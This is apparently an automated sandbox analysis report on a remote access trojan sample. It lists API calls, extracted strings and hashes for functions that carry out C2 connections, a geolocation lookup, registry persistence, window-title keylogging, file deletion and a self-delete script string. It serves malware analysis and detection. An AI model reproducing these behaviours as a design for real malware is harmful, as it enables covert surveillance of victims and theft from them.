                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$ErrorLastLocalTime
                                                          • String ID: | $%I64u$6.0.0 Pro$C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$PhNG$Rmc-JLQBNY$TLS Off$TLS On $TeF$dMG$hSG$hlight$name$NG$NG$UG$VG
                                                          • API String ID: 524882891-3805499607
                                                          • Opcode ID: 918bc987664b8491f60aceb4f06e3f4d68d9346336c78d86623a22e9571963aa
                                                          • Instruction ID: c3263a97f07b8ae9d11225c8127e62ab27a72c03ae3a8f764161ebb565a1ac44
                                                          • Opcode Fuzzy Hash: 918bc987664b8491f60aceb4f06e3f4d68d9346336c78d86623a22e9571963aa
                                                          • Instruction Fuzzy Hash: EE625E71A001145ACB18F771DDA6AEE73659FA0308F1041BFB80A771E2EF785E85CA9D

                                                          Control-flow Graph

                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 0040A456
                                                          • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                          • GetForegroundWindow.USER32 ref: 0040A467
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                          • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                            • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                          • String ID: [${ User has been idle for $ minutes }$<mG$<mG$<mG$]
                                                          • API String ID: 911427763-3636820255
                                                          • Opcode ID: 0c0e445e6939d6f7940a0c5a45d91b61cd855127d753689433e6956e50b99563
                                                          • Instruction ID: ab9145b4e211f5f3da3af6290e6e7a2c9d96cae7f6b46a2c86e206227f6ebbf0
                                                          • Opcode Fuzzy Hash: 0c0e445e6939d6f7940a0c5a45d91b61cd855127d753689433e6956e50b99563
                                                          • Instruction Fuzzy Hash: 1951D0716043409BC324FB25D886AAE7795AF84718F00093FF446A32E2DF7C9E55868F

                                                          Control-flow Graph

                                                          control_flow_graph 1034 40428c-4042ad connect 1035 4043e1-4043e5 1034->1035 1036 4042b3-4042b6 1034->1036 1039 4043e7-4043f5 WSAGetLastError 1035->1039 1040 40445f 1035->1040 1037 4043da-4043dc 1036->1037 1038 4042bc-4042bf 1036->1038 1041 404461-404465 1037->1041 1042 4042c1-4042e8 call 404cbf call 401f66 call 41a891 1038->1042 1043 4042eb-4042f5 call 42035c 1038->1043 1039->1040 1044 4043f7-4043fa 1039->1044 1040->1041 1042->1043 1056 404306-404313 call 42057e 1043->1056 1057 4042f7-404301 1043->1057 1046 404439-40443e 1044->1046 1047 4043fc-404437 call 41be81 call 404c9e call 401f66 call 41a891 call 401eea 1044->1047 1049 404443-40445c call 401f66 * 2 call 41a891 1046->1049 1047->1040 1049->1040 1066 404315-404338 call 401f66 * 2 call 41a891 1056->1066 1067 40434c-404357 call 42113f 1056->1067 1057->1049 1096 40433b-404347 call 42039c 1066->1096 1080 404389-404396 call 4204f5 1067->1080 1081 404359-404387 call 401f66 * 2 call 41a891 call 42079d 1067->1081 1093 404398-4043bb call 401f66 * 2 call 41a891 1080->1093 1094 4043be-4043d7 CreateEventW * 2 1080->1094 1081->1096 1093->1094 1094->1037 1096->1040
                                                          APIs
                                                          • connect.WS2_32(?,?,?), ref: 004042A5
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                          • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                          • API String ID: 994465650-2151626615
                                                          • Opcode ID: cf49c6f555c49f8e19da3bd343099bda81994a7576a786df9d473324a29203c1
                                                          • Instruction ID: 8d860672b69a19ae3c360ccb47b0a38bc4e99592ce22fc56bfe6acc5d0e7da0a
                                                          • Opcode Fuzzy Hash: cf49c6f555c49f8e19da3bd343099bda81994a7576a786df9d473324a29203c1
                                                          • Instruction Fuzzy Hash: D54109B0B0020277CA04B77A884766E7A55AB85314B80012FE901A7AD3FE3DAD2587DF

                                                          Control-flow Graph

                                                          control_flow_graph 1109 40c89e-40c8c3 call 401e52 1112 40c8c9 1109->1112 1113 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1109->1113 1114 40c8d0-40c8d5 1112->1114 1115 40c9c2-40c9c7 1112->1115 1116 40c905-40c90a 1112->1116 1117 40c9d8 1112->1117 1118 40c9c9-40c9ce call 43ae1f 1112->1118 1119 40c8da-40c8e8 call 41a956 call 401e18 1112->1119 1120 40c8fb-40c900 1112->1120 1121 40c9bb-40c9c0 1112->1121 1122 40c90f-40c916 call 41b366 1112->1122 1137 40ca18-40ca85 call 403b40 call 40cd0a call 402860 * 2 call 401e13 * 5 1113->1137 1125 40c9dd-40c9e2 call 43ae1f 1114->1125 1115->1125 1116->1125 1117->1125 1129 40c9d3-40c9d6 1118->1129 1141 40c8ed 1119->1141 1120->1125 1121->1125 1138 40c918-40c968 call 403b40 call 43ae1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1122->1138 1139 40c96a-40c9b6 call 403b40 call 43ae1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1122->1139 1134 40c9e3-40c9e8 call 4082d7 1125->1134 1129->1117 1129->1134 1134->1113 1147 40c8f1-40c8f6 call 401e13 1138->1147 1139->1141 1141->1147 1147->1113
                                                          APIs
                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LongNamePath
                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                          • API String ID: 82841172-425784914
                                                          • Opcode ID: 4c2cb8f42a11c4837a933b64665c4adbebb485c1a13128294ca0300166a406df
                                                          • Instruction ID: f058a63a2e06dcb2b247864a9289bab0e783a4957c20bc3838a58b63f1508e50
                                                          • Opcode Fuzzy Hash: 4c2cb8f42a11c4837a933b64665c4adbebb485c1a13128294ca0300166a406df
                                                          • Instruction Fuzzy Hash: F0415C721482009AC214F721DC97DAFB7A4AE90759F10063FF546720E2EE7CAA59C69F

                                                          Control-flow Graph

                                                          APIs
                                                          • Sleep.KERNEL32(00001388), ref: 00409E62
                                                            • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                            • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                            • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                            • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                            • Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                          Similarity
                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                          • String ID: PSG$PSG
                                                          • API String ID: 3795512280-3836871860
                                                          • Opcode ID: 59d6eda1dc5a04f955d13a7f06d1206386346812c1dd96bd75aa56d1c89d0c36
                                                          • Instruction ID: 2e46ee78bd67d64478951c63fc585b7447d0c94e1b250d5b4a4871e09aa14890
                                                          • Opcode Fuzzy Hash: 59d6eda1dc5a04f955d13a7f06d1206386346812c1dd96bd75aa56d1c89d0c36
                                                          • Instruction Fuzzy Hash: 68517F716043005ACB05BB71C866ABF779AAF81309F00453FF886B71E2DE7D9D45C69A

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0041B366: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B377
                                                            • Part of subcall function 0041B366: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B37E
                                                            • Part of subcall function 004125EB: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 0041260F
                                                            • Part of subcall function 004125EB: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 0041262C
                                                            • Part of subcall function 004125EB: RegCloseKey.KERNEL32(?), ref: 00412637
                                                          • StrToIntA.SHLWAPI(00000000,0046CC58,?,00000000,00000000,004750FC,00000003,Exe,00000000,0000000E,00000000,0046656C,00000003,00000000), ref: 0041A6E4
                                                          Similarity
                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                          • String ID: (32 bit)$ (64 bit)$8ZG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                          • API String ID: 782494840-1475859423
                                                          • Opcode ID: f7a85f495538476fd04f4c990f04aa920c7271ab473fda262265197c8bc14782
                                                          • Instruction ID: 1adcdd06a104af508aeef54d465e0c78d2d81651f2e3fe11076ab4bcd17b792f
                                                          • Opcode Fuzzy Hash: f7a85f495538476fd04f4c990f04aa920c7271ab473fda262265197c8bc14782
                                                          • Instruction Fuzzy Hash: 1811C660A001012AC704B3A6DCDBDBF765A9B91304F44413FB856A71E2FB6C9D9583EE

                                                          Control-flow Graph

                                                          APIs
                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A749
                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A75F
                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A778
                                                          • InternetCloseHandle.WININET(00000000), ref: 0041A7BE
                                                          • InternetCloseHandle.WININET(00000000), ref: 0041A7C1
                                                          Strings
                                                          • http://geoplugin.net/json.gp, xrefs: 0041A759
                                                          Similarity
                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                          • String ID: http://geoplugin.net/json.gp
                                                          • API String ID: 3121278467-91888290
                                                          • Opcode ID: d708bf57c9bcdd1f8a7a65ae69f1350cab0609a96e180bb87bda40cc4cda5db0
                                                          • Instruction ID: dd066ffe0ad47051801ff1a9504fa95a24023bf504f9cdcf24902ddc36d2e50e
                                                          • Opcode Fuzzy Hash: d708bf57c9bcdd1f8a7a65ae69f1350cab0609a96e180bb87bda40cc4cda5db0
                                                          • Instruction Fuzzy Hash: C311947110A3126BD624EB169C85DBF7BECEF86765F00043EF845A2191DF68D848C6BA

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                          • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                          • String ID: pQG
                                                          • API String ID: 1958988193-3769108836
                                                          • Opcode ID: 0f98f6b2fa3e8daa10c794e4e90518561bdac5fa53dda9530c93ee6adae91d98
                                                          • Instruction ID: 007c54a35b5ab6fada7f5b2b4f31fda992404cc28ee9ac254c5285dcec39f6dc
                                                          • Opcode Fuzzy Hash: 0f98f6b2fa3e8daa10c794e4e90518561bdac5fa53dda9530c93ee6adae91d98
                                                          • Instruction Fuzzy Hash: 0911E730640B406AE720E724D88972F7B9AAB81316F44047EF18566AE3CA799CD5C29D

                                                          Control-flow Graph

                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004127B9
                                                          • RegSetValueExA.KERNEL32(?,XwF,00000000,?,00000000,00000000,00475308,?,?,0040E6D3,00467758,6.0.0 Pro), ref: 004127E1
                                                          • RegCloseKey.KERNEL32(?,?,?,0040E6D3,00467758,6.0.0 Pro), ref: 004127EC
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: XwF$pth_unenc
                                                          • API String ID: 1818849710-1649331827
                                                          • Opcode ID: a33492682faf8f4a7bd2e45a582a8398943db92faccb4fb8927a7d9da3d413cc
                                                          • Instruction ID: b42ea712bc7a6ff48bd64609183fdbccf638e423d93a2202917fd6756948167f
                                                          • Opcode Fuzzy Hash: a33492682faf8f4a7bd2e45a582a8398943db92faccb4fb8927a7d9da3d413cc
                                                          • Instruction Fuzzy Hash: 27F06D32140204BBCB00AFA1DD45AEF3768EF00751B108169B916B60A1EE759E04EBA4

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                            • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                            • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                          Similarity
                                                          • API ID: CreateThread$LocalTimewsprintf
                                                          • String ID: Offline Keylogger Started
                                                          • API String ID: 465354869-4114347211
                                                          • Opcode ID: 413225cce52aee32b715eff5e13c65a485cf973104212bdc3a05f84c9635596c
                                                          • Instruction ID: 15e43fcc554e39227c644a0273f32637653ac1eeca6ef832bd6c9a92d0497390
                                                          • Opcode Fuzzy Hash: 413225cce52aee32b715eff5e13c65a485cf973104212bdc3a05f84c9635596c
                                                          • Instruction Fuzzy Hash: 0A1198B15003097AD224BA36CC86DBF7A5CDA813A8B40053EB845622D3EA785E14C6FB
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,TeF), ref: 004128BB
                                                          • RegSetValueExA.KERNEL32(TeF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128D6
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128E1
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: TeF
                                                          • API String ID: 1818849710-331424825
                                                          • Opcode ID: 69388a3f5ca785ef31159ee28a7932d701a8b17d3c2adace4bd37096d90c6bf5
                                                          • Instruction ID: 5082c9e4fe043c0a9a82c1e0a3a4def458545ef8caf92c2e29ea1f35f3ad8a86
                                                          • Opcode Fuzzy Hash: 69388a3f5ca785ef31159ee28a7932d701a8b17d3c2adace4bd37096d90c6bf5
                                                          • Instruction Fuzzy Hash: C9E03971640308BFDF119B919C05FDB3BA8EB04B95F004165FA05F61A1DAB1DE18EBA8
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                          • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                          Similarity
                                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 3360349984-0
                                                          • Opcode ID: eceb8113e26336935bf5c75f2de3c1b2d8d60dab3ee53c9ce013581b5c88e7f2
                                                          • Instruction ID: 5371640f48c6a0368c7cea64887978d4ac2a240c02499e3407376e9d4191e8ff
                                                          • Opcode Fuzzy Hash: eceb8113e26336935bf5c75f2de3c1b2d8d60dab3ee53c9ce013581b5c88e7f2
                                                          • Instruction Fuzzy Hash: 10417171504301ABC700FB61CC55D7FBBE9AFD5315F00093EF892A32E2EE389909866A
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B7D9
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B7F6
                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B80A
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041B817
                                                          Similarity
                                                          • API ID: File$CloseCreateHandlePointerWrite
                                                          • String ID:
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: CountEventTick
                                                          • String ID: NG
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040DA7D,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046656C,00000003,00000000), ref: 0040BEE6
                                                          • GetLastError.KERNEL32 ref: 0040BEF1
                                                          Strings
                                                          Similarity
                                                          • API ID: CreateErrorLastMutex
                                                          • String ID: Rmc-JLQBNY
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 0041260F
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 0041262C
                                                          • RegCloseKey.KERNEL32(?), ref: 00412637
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00475308), ref: 00412751
                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041276A
                                                          • RegCloseKey.KERNEL32(00000000), ref: 00412775
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004125AF
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00475308), ref: 004125CD
                                                          • RegCloseKey.KERNEL32(?), ref: 004125D8
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004670E0), ref: 0041255D
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004670E0), ref: 00412571
                                                          • RegCloseKey.KERNEL32(?,?,?,0040B996,004670E0), ref: 0041257C
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041AB64
                                                          Strings
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID: @
                                                          APIs
                                                          • _free.LIBCMT ref: 0044BBEF
                                                            • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                          • RtlReAllocateHeap.NTDLL(00000000,00476D58,?,00000004,00000000,?,0044EB1A,00476D58,00000004,?,00476D58,?,?,00443335,00476D58,?), ref: 0044BC2B
                                                          Similarity
                                                          • API ID: AllocateHeap$_free
                                                          • String ID:
                                                          APIs
                                                          • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                            • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                          Similarity
                                                          • API ID: CreateEventStartupsocket
                                                          • String ID:
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 0041AE7F
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AE92
                                                          Similarity
                                                          • API ID: Window$ForegroundText
                                                          • String ID:
                                                          APIs
                                                          • getaddrinfo.WS2_32(00000000,00000000,00000000,00472B28,004750FC,00000000,00414318,00000000,00000001), ref: 00414094
                                                          • WSASetLastError.WS2_32(00000000), ref: 00414099
                                                            • Part of subcall function 00413F0F: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413F5E
                                                            • Part of subcall function 00413F0F: LoadLibraryA.KERNEL32(?), ref: 00413FA0
                                                            • Part of subcall function 00413F0F: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413FC0
                                                            • Part of subcall function 00413F0F: FreeLibrary.KERNEL32(00000000), ref: 00413FC7
                                                            • Part of subcall function 00413F0F: LoadLibraryA.KERNEL32(?), ref: 00413FFF
                                                            • Part of subcall function 00413F0F: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414011
                                                            • Part of subcall function 00413F0F: FreeLibrary.KERNEL32(00000000), ref: 00414018
                                                            • Part of subcall function 00413F0F: GetProcAddress.KERNEL32(00000000,?), ref: 00414027
                                                          Similarity
                                                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                          • String ID:
                                                          APIs
                                                          • API ID: _wcslen
                                                          • String ID:
                                                          • API String ID: 176396367-0
                                                          • Opcode ID: 025e3e4768cc8a802bf55c327d7a2483ad7764abdea9560a4cc63c803d4be503
                                                          • Instruction ID: 7b719d08391bbb12b01dd12fa1e9474f3c31e37c6e717f7fed2b29792a4b3228
                                                          • Opcode Fuzzy Hash: 025e3e4768cc8a802bf55c327d7a2483ad7764abdea9560a4cc63c803d4be503
                                                          • Instruction Fuzzy Hash: B71193329002059BCB05FF66D8529EE77A4EF54319B10443FF842662E2EF78A915CB98
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 0df71086ebe011a22fdff847967a9c5229befe104b2723ee1c4cd472e7f23894
                                                          • Instruction ID: 40638bbf90b8c7646580dfe44e72c34c865d7c07d7b9b06d8b79509a7ad90776
                                                          • Opcode Fuzzy Hash: 0df71086ebe011a22fdff847967a9c5229befe104b2723ee1c4cd472e7f23894
                                                          • Instruction Fuzzy Hash: 52E0E5B1B00220A6FB202A6A8C02B5B36498F437B4F070033AC0A9A291CE6CCC4081AF
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                          • API ID: Startup
                                                          • String ID:
                                                          • API String ID: 724789610-0
                                                          • Opcode ID: 512c305c5d81d862cf08042479f934390d4c65f7aad148c3c3ac63496dcf4775
                                                          • Instruction ID: a6df37c1a3c4b0bfee4e794801b63ea3b6ec8424062e123ecf3ffc10766d7ffb
                                                          • Opcode Fuzzy Hash: 512c305c5d81d862cf08042479f934390d4c65f7aad148c3c3ac63496dcf4775
                                                          • Instruction Fuzzy Hash: F7D012325586094ED620AAB5AD0F8A4775CD317611F0003BA6CB5825D3FA84561CC6AB
                                                          APIs
                                                          • API ID: send
                                                          • String ID:
                                                          • API String ID: 2809346765-0
                                                          • Opcode ID: 733b60b5868be77d00c88bb6e02a93299a3caf11162c6b1e2887e039244bfe1f
                                                          • Instruction ID: aaa3dbc129b5069e484ee587900df28e469ef685d0a3e158187009c9450646dc
                                                          • Opcode Fuzzy Hash: 733b60b5868be77d00c88bb6e02a93299a3caf11162c6b1e2887e039244bfe1f
                                                          • Instruction Fuzzy Hash: 30B09279118302BFCA051B60CC0887A7EB6ABC9381B108C2CB546611B0DE37C490EB36
                                                          APIs
                                                          • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                          • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                            • Part of subcall function 0041B63A: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B694
                                                            • Part of subcall function 0041B63A: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B6C6
                                                            • Part of subcall function 0041B63A: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B717
                                                            • Part of subcall function 0041B63A: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004752F0,00475308), ref: 0041B76C
                                                            • Part of subcall function 0041B63A: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004752F0,00475308), ref: 0041B773
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                            • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00466454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                            • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                            • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                            • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                            • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000310,00000000,{NAL,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000), ref: 0040450E
                                                            • Part of subcall function 00404468: SetEvent.KERNEL32(00000310,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000,?,?,?,?,?,00414E7B), ref: 0040453C
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                          • DeleteFileA.KERNEL32(?), ref: 004078CC
